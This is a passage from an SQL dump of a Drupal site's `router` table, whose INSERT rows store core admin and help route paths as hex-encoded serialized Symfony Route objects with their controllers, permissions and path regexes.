3223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31393a227461786f6e6f6d795f766f636162756c617279223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a39333a227b5e2f61646d696e2f7374727563747572652f7461786f6e6f6d792f6d616e6167652f283f503c7461786f6e6f6d795f766f636162756c6172793e5b5e2f5d2b2b292f6f766572766965772f6669656c64732f7265757365247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a32323a222f6f766572766965772f6669656c64732f7265757365223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31393a227461786f6e6f6d795f766f636162756c617279223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a33323a222f61646d696e2f7374727563747572652f7461786f6e6f6d792f6d616e616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31393a227461786f6e6f6d795f766f636162756c617279223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3234373b733a31343a227061747465726e4f75746c696e65223b733a35363a222f61646d696e2f7374727563747572652f7461786f6e6f6d792f6d616e6167652f252f6f766572766965772f6669656c64732f7265757365223b733a383a226e756d5061727473223b693a383b7d7d, 8),
('field_ui.field_storage_config_reuse_user', '/admin/config/people/accounts/fields/reuse', '/admin/config/people/accounts/fields/reuse', 63, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a34323a222f61646d696e2f636f6e6669672f70656f706c652f6163636f756e74732f6669656c64732f7265757365223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a343a7b733a353a225f666f726d223b733a34333a225c44727570616c5c6669656c645f75695c466f726d5c4669656c6453746f726167655265757365466f726d223b733a363a225f7469746c65223b733a32343a2252652d75736520616e206578697374696e67206669656c64223b733a31343a22656e746974795f747970655f6964223b733a343a2275736572223b733a363a2262756e646c65223b733a343a2275736572223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a32383a225f6669656c645f75695f6669656c645f72657573655f616363657373223b733a32323a2261646d696e69737465722075736572206669656c6473223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a393a225f6669656c645f7569223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33333a226163636573735f636865636b2e6669656c645f75692e6669656c645f7265757365223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a34393a227b5e2f61646d696e2f636f6e6669672f70656f706c652f6163636f756e74732f6669656c64732f7265757365247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a34323a222f61646d696e2f636f6e6669672f70656f706c652f6163636f756e74732f6669656c64732f7265757365223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a36333b733a31343a227061747465726e4f75746c696e65223b733a34323a222f61646d696e2f636f6e6669672f70656f706c652f6163636f756e74732f6669656c64732f7265757365223b733a383a226e756d5061727473223b693a363b7d7d, 6),
('file.ajax_progress', '/file/progress/{key}', '/file/progress/%', 6, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32303a222f66696c652f70726f67726573732f7b6b65797d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a313a7b733a31313a225f636f6e74726f6c6c6572223b733a35383a225c44727570616c5c66696c655c436f6e74726f6c6c65725c46696c65576964676574416a6178436f6e74726f6c6c65723a3a70726f6772657373223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a31343a2261636365737320636f6e74656e74223b7d733a373a226f7074696f6e73223b613a333a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a333a226b6579223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a33373a227b5e2f66696c652f70726f67726573732f283f503c6b65793e5b5e2f5d2b2b29247d734475223b733a31313a22706174685f746f6b656e73223b613a323a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a333a226b6579223b693a343b623a313b7d693a313b613a323a7b693a303b733a343a2274657874223b693a313b733a31343a222f66696c652f70726f6772657373223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a333a226b6579223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a363b733a31343a227061747465726e4f75746c696e65223b733a31363a222f66696c652f70726f67726573732f25223b733a383a226e756d5061727473223b693a333b7d7d, 3),
('filter.admin_overview', '/admin/config/content/formats', '/admin/config/content/formats', 15, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32393a222f61646d696e2f636f6e6669672f636f6e74656e742f666f726d617473223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31323a225f656e746974795f6c697374223b733a31333a2266696c7465725f666f726d6174223b733a363a225f7469746c65223b733a32343a225465787420666f726d61747320616e6420656469746f7273223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a31383a2261646d696e69737465722066696c74657273223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a33363a227b5e2f61646d696e2f636f6e6669672f636f6e74656e742f666f726d617473247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a32393a222f61646d696e2f636f6e6669672f636f6e74656e742f666f726d617473223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a31353b733a31343a227061747465726e4f75746c696e65223b733a32393a222f61646d696e2f636f6e6669672f636f6e74656e742f666f726d617473223b733a383a226e756d5061727473223b693a343b7d7d, 4),
('filter.format_add', '/admin/config/content/formats/add', '/admin/config/content/formats/add', 31, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a33333a222f61646d696e2f636f6e6669672f636f6e74656e742f666f726d6174732f616464223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31323a225f656e746974795f666f726d223b733a31373a2266696c7465725f666f726d61742e616464223b733a363a225f7469746c65223b733a31353a22416464207465787420666f726d6174223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a32313a225f656e746974795f6372656174655f616363657373223b733a31333a2266696c7465725f666f726d6174223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32363a226163636573735f636865636b2e656e746974795f637265617465223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a34303a227b5e2f61646d696e2f636f6e6669672f636f6e74656e742f666f726d6174732f616464247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a33333a222f61646d696e2f636f6e6669672f636f6e74656e742f666f726d6174732f616464223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a33313b733a31343a227061747465726e4f75746c696e65223b733a33333a222f61646d696e2f636f6e6669672f636f6e74656e742f666f726d6174732f616464223b733a383a226e756d5061727473223b693a353b7d7d, 5),
('filter.tips', '/filter/tips/{filter_format}', '/filter/tips/%', 6, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32383a222f66696c7465722f746970732f7b66696c7465725f666f726d61747d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31313a225f636f6e74726f6c6c6572223b733a35343a225c44727570616c5c66696c7465725c436f6e74726f6c6c65725c46696c746572436f6e74726f6c6c65723a3a66696c74657254697073223b733a363a225f7469746c65223b733a31323a22436f6d706f73652074697073223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31343a225f656e746974795f616363657373223b733a31373a2266696c7465725f666f726d61742e757365223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a31333a2266696c7465725f666f726d6174223b613a323a7b733a343a2274797065223b733a32303a22656e746974793a66696c7465725f666f726d6174223b733a393a22636f6e766572746572223b733a32313a22706172616d636f6e7665727465722e656e74697479223b7d7d733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31333a2266696c7465725f666f726d6174223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a34353a227b5e2f66696c7465722f746970732f283f503c66696c7465725f666f726d61743e5b5e2f5d2b2b29247d734475223b733a31313a22706174685f746f6b656e73223b613a323a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31333a2266696c7465725f666f726d6174223b693a343b623a313b7d693a313b613a323a7b693a303b733a343a2274657874223b693a313b733a31323a222f66696c7465722f74697073223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31333a2266696c7465725f666f726d6174223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a363b733a31343a227061747465726e4f75746c696e65223b733a31343a222f66696c7465722f746970732f25223b733a383a226e756d5061727473223b693a333b7d7d, 3),
('filter.tips_all', '/filter/tips', '/filter/tips', 3, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a31323a222f66696c7465722f74697073223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31313a225f636f6e74726f6c6c6572223b733a35343a225c44727570616c5c66696c7465725c436f6e74726f6c6c65725c46696c746572436f6e74726f6c6c65723a3a66696c74657254697073223b733a363a225f7469746c65223b733a31323a22436f6d706f73652074697073223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a373a225f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a31333a2266696c7465725f666f726d6174223b613a323a7b733a343a2274797065223b733a32303a22656e746974793a66696c7465725f666f726d6174223b733a393a22636f6e766572746572223b733a32313a22706172616d636f6e7665727465722e656e74697479223b7d7d733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32303a226163636573735f636865636b2e64656661756c74223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a31393a227b5e2f66696c7465722f74697073247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a31323a222f66696c7465722f74697073223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a333b733a31343a227061747465726e4f75746c696e65223b733a31323a222f66696c7465722f74697073223b733a383a226e756d5061727473223b693a323b7d7d, 2);
INSERT INTO `router` (`name`, `path`, `pattern_outline`, `fit`, `route`, `number_parts`) VALUES
('help.help_topic', '/admin/help/topic/{id}', '/admin/help/topic/%', 14, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32323a222f61646d696e2f68656c702f746f7069632f7b69647d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a313a7b733a31313a225f636f6e74726f6c6c6572223b733a36343a225c44727570616c5c68656c705c436f6e74726f6c6c65725c48656c70546f706963506c7567696e436f6e74726f6c6c65723a3a7669657748656c70546f706963223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a31373a226163636573732068656c70207061676573223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a323a226964223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a33393a227b5e2f61646d696e2f68656c702f746f7069632f283f503c69643e5b5e2f5d2b2b29247d734475223b733a31313a22706174685f746f6b656e73223b613a323a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a323a226964223b693a343b623a313b7d693a313b613a323a7b693a303b733a343a2274657874223b693a313b733a31373a222f61646d696e2f68656c702f746f706963223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a323a226964223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a31343b733a31343a227061747465726e4f75746c696e65223b733a31393a222f61646d696e2f68656c702f746f7069632f25223b733a383a226e756d5061727473223b693a343b7d7d, 4),
('help.main', '/admin/help', '/admin/help', 3, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a31313a222f61646d696e2f68656c70223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31313a225f636f6e74726f6c6c6572223b733a34383a225c44727570616c5c68656c705c436f6e74726f6c6c65725c48656c70436f6e74726f6c6c65723a3a68656c704d61696e223b733a363a225f7469746c65223b733a343a2248656c70223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a31373a226163636573732068656c70207061676573223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a31383a227b5e2f61646d696e2f68656c70247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a31313a222f61646d696e2f68656c70223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a333b733a31343a227061747465726e4f75746c696e65223b733a31313a222f61646d696e2f68656c70223b733a383a226e756d5061727473223b693a323b7d7d, 2),
('help.page', '/admin/help/{name}', '/admin/help/%', 6, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a31383a222f61646d696e2f68656c702f7b6e616d657d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31313a225f636f6e74726f6c6c6572223b733a34383a225c44727570616c5c68656c705c436f6e74726f6c6c65725c48656c70436f6e74726f6c6c65723a3a68656c7050616765223b733a363a225f7469746c65223b733a343a2248656c70223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a31373a226163636573732068656c70207061676573223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a343a226e616d65223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a33353a227b5e2f61646d696e2f68656c702f283f503c6e616d653e5b5e2f5d2b2b29247d734475223b733a31313a22706174685f746f6b656e73223b613a323a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a343a226e616d65223b693a343b623a313b7d693a313b613a323a7b693a303b733a343a2274657874223b693a313b733a31313a222f61646d696e2f68656c70223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a343a226e616d65223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a363b733a31343a227061747465726e4f75746c696e65223b733a31333a222f61646d696e2f68656c702f25223b733a383a226e756d5061727473223b693a333b7d7d, 3),
('history.get_last_node_view', '/history/get_node_read_timestamps', '/history/get_node_read_timestamps', 3, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a33333a222f686973746f72792f6765745f6e6f64655f726561645f74696d657374616d7073223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a313a7b733a31313a225f636f6e74726f6c6c6572223b733a36373a225c44727570616c5c686973746f72795c436f6e74726f6c6c65725c486973746f7279436f6e74726f6c6c65723a3a6765744e6f64655265616454696d657374616d7073223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a31343a2261636365737320636f6e74656e74223b7d733a373a226f7074696f6e73223b613a333a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a34303a227b5e2f686973746f72792f6765745f6e6f64655f726561645f74696d657374616d7073247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a33333a222f686973746f72792f6765745f6e6f64655f726561645f74696d657374616d7073223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a333b733a31343a227061747465726e4f75746c696e65223b733a33333a222f686973746f72792f6765745f6e6f64655f726561645f74696d657374616d7073223b733a383a226e756d5061727473223b693a323b7d7d, 2),
('history.read_node', '/history/{node}/read', '/history/%/read', 5, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32303a222f686973746f72792f7b6e6f64657d2f72656164223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a313a7b733a31313a225f636f6e74726f6c6c6572223b733a35343a225c44727570616c5c686973746f72795c436f6e74726f6c6c65725c486973746f7279436f6e74726f6c6c65723a3a726561644e6f6465223b7d733a31323a22726571756972656d656e7473223b613a323a7b733a31343a225f656e746974795f616363657373223b733a393a226e6f64652e76696577223b733a343a226e6f6465223b733a333a225c642b223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a343a226e6f6465223b613a323a7b733a343a2274797065223b733a31313a22656e746974793a6e6f6465223b733a393a22636f6e766572746572223b733a32313a22706172616d636f6e7665727465722e656e74697479223b7d7d733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a343a226e6f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a33343a227b5e2f686973746f72792f283f503c6e6f64653e5c642b292f72656164247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a353a222f72656164223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a333a225c642b223b693a333b733a343a226e6f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a383a222f686973746f7279223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a343a226e6f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a353b733a31343a227061747465726e4f75746c696e65223b733a31353a222f686973746f72792f252f72656164223b733a383a226e756d5061727473223b693a333b7d7d, 3),
('image.effect_add_form', '/admin/config/media/image-styles/manage/{image_style}/add/{image_effect}', '/admin/config/media/image-styles/manage/%/add/%', 250, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a37323a222f61646d696e2f636f6e6669672f6d656469612f696d6167652d7374796c65732f6d616e6167652f7b696d6167655f7374796c657d2f6164642f7b696d6167655f6566666563747d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a33373a225c44727570616c5c696d6167655c466f726d5c496d616765456666656374416464466f726d223b733a363a225f7469746c65223b733a31363a2241646420696d61676520656666656374223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a32333a2261646d696e697374657220696d616765207374796c6573223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a31313a22696d6167655f7374796c65223b613a323a7b733a343a2274797065223b733a31383a22656e746974793a696d6167655f7374796c65223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a31313a22696d6167655f7374796c65223b693a313b733a31323a22696d6167655f656666656374223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3130303a227b5e2f61646d696e2f636f6e6669672f6d656469612f696d6167655c2d7374796c65732f6d616e6167652f283f503c696d6167655f7374796c653e5b5e2f5d2b2b292f6164642f283f503c696d6167655f6566666563743e5b5e2f5d2b2b29247d734475223b733a31313a22706174685f746f6b656e73223b613a343a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31323a22696d6167655f656666656374223b693a343b623a313b7d693a313b613a323a7b693a303b733a343a2274657874223b693a313b733a343a222f616464223b7d693a323b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31313a22696d6167655f7374796c65223b693a343b623a313b7d693a333b613a323a7b693a303b733a343a2274657874223b693a313b733a33393a222f61646d696e2f636f6e6669672f6d656469612f696d6167652d7374796c65732f6d616e616765223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a31313a22696d6167655f7374796c65223b693a313b733a31323a22696d6167655f656666656374223b7d733a31303a22686f73745f7265676578223b4